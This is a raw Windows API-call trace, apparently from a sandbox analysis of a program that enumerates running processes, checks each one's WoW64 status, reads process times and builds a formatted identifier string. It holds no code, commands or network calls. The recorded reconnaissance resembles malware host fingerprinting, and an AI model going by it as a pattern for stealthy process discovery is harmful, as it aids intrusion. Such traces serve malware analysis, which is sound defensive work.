	[0122.709] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.710] CloseHandle (hObject=0x698) returned 1
	[0122.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.710] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.710] CloseHandle (hObject=0x698) returned 1
	[0122.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.710] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.710] CloseHandle (hObject=0x698) returned 1
	[0122.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.711] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.711] CloseHandle (hObject=0x698) returned 1
	[0122.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.742] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d628, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.747] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.747] CloseHandle (hObject=0x698) returned 1
	[0122.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.748] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.748] CloseHandle (hObject=0x698) returned 1
	[0122.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.748] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.748] CloseHandle (hObject=0x698) returned 1
	[0122.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.748] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.749] CloseHandle (hObject=0x698) returned 1
	[0122.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.749] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.749] CloseHandle (hObject=0x698) returned 1
	[0122.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.749] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.749] CloseHandle (hObject=0x698) returned 1
	[0122.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.750] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.750] CloseHandle (hObject=0x698) returned 1
	[0122.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.750] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.750] CloseHandle (hObject=0x698) returned 1
	[0122.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.750] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.751] CloseHandle (hObject=0x698) returned 1
	[0122.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5ad8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.751] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.751] CloseHandle (hObject=0x698) returned 1
	[0122.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.751] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.751] CloseHandle (hObject=0x698) returned 1
	[0122.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.752] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.752] CloseHandle (hObject=0x698) returned 1
	[0122.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.752] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.752] CloseHandle (hObject=0x698) returned 1
	[0122.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d618, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.752] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.752] CloseHandle (hObject=0x698) returned 1
	[0122.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.753] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.753] CloseHandle (hObject=0x698) returned 1
	[0122.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9820, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.753] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.753] CloseHandle (hObject=0x698) returned 1
	[0122.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.753] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.753] CloseHandle (hObject=0x698) returned 1
	[0122.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5a30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.754] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.754] CloseHandle (hObject=0x698) returned 1
	[0122.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.754] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.754] CloseHandle (hObject=0x698) returned 1
	[0122.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.754] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.754] CloseHandle (hObject=0x698) returned 1
	[0122.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.755] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.755] CloseHandle (hObject=0x698) returned 1
	[0122.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5aa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.755] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.755] CloseHandle (hObject=0x698) returned 1
	[0122.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.756] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.756] CloseHandle (hObject=0x698) returned 1
	[0122.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b99d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.756] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.756] CloseHandle (hObject=0x698) returned 1
	[0122.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.757] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.757] CloseHandle (hObject=0x698) returned 1
	[0122.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.757] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.757] CloseHandle (hObject=0x698) returned 1
	[0122.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.757] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.757] CloseHandle (hObject=0x698) returned 1
	[0122.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.758] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.758] CloseHandle (hObject=0x698) returned 1
	[0122.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.758] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.758] CloseHandle (hObject=0x698) returned 1
	[0122.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9938, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.758] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.758] CloseHandle (hObject=0x698) returned 1
	[0122.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9a28, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.759] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.759] CloseHandle (hObject=0x698) returned 1
	[0122.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.759] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetLastError () returned 0x5
	[0122.760] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.760] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.760] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
